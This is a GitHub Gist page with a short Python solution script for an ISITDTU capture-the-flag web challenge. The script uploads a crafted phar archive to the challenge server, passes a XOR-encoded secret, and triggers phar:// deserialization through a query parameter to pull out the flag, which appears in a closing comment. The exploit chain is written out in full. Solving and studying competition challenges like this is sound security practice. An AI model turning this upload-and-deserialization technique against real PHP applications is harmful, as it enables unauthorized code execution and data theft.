Created
September 8, 2019 02:50
-
-
Save ducnhse130201/f6a633cbd04dc8f36162d655ae982a9a to your computer and use it in GitHub Desktop.
solve_multi_web.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import binascii | |
| from base64 import * | |
| def xor(data, key): | |
| from itertools import izip, cycle | |
| xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in izip(data, cycle(key))) | |
| return xored | |
| a = open("phar.phar", "rb").read()[34:] | |
| save = open("phar.phar", "rb").read()[34:] | |
| url = "http://192.241.144.92/oldchall/e9941d1621bdf00ef6a17c1e5176c1bcbb966b71/index.php?mytresure" | |
| cookies = {"PHPSESSID": "e96ujfgcgvbji7425o2aabj06e"} | |
| data = {"secret": xor("GIF","##\n"), "save": save} | |
| s = requests.Session() | |
| proxy = {"http": "http://127.0.0.1:8888", "https": "http://127.0.0.1:8888"} | |
| r = s.post(url, data=data, proxies=proxy, cookies=cookies) | |
| r = s.get(url, proxies=proxy, cookies=cookies) | |
| data = r.content.decode("utf-8").split( | |
| """<div class="alert alert-warning">Your original treasure stored at""")[1].split(" </div>")[0].strip().replace(".txt", "") | |
| url2 = "http://192.241.144.92/oldchall/e9941d1621bdf00ef6a17c1e5176c1bcbb966b71/index.php?secret=" + xor("GIF", "##\n") + \ | |
| "&friendtresure=phar://" + data | |
| content = s.get(url2, proxies=proxy, cookies=cookies).text.split( | |
| '<img src="data:images/png;base64,')[1].replace('" height="300" width="800">','').strip() | |
| print(xor(b64decode(content), xor("GIF", "##\n"))) | |
| # ISITDTU{850d5f07cd08a49a0f74d6a089353f3196e74d7e} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment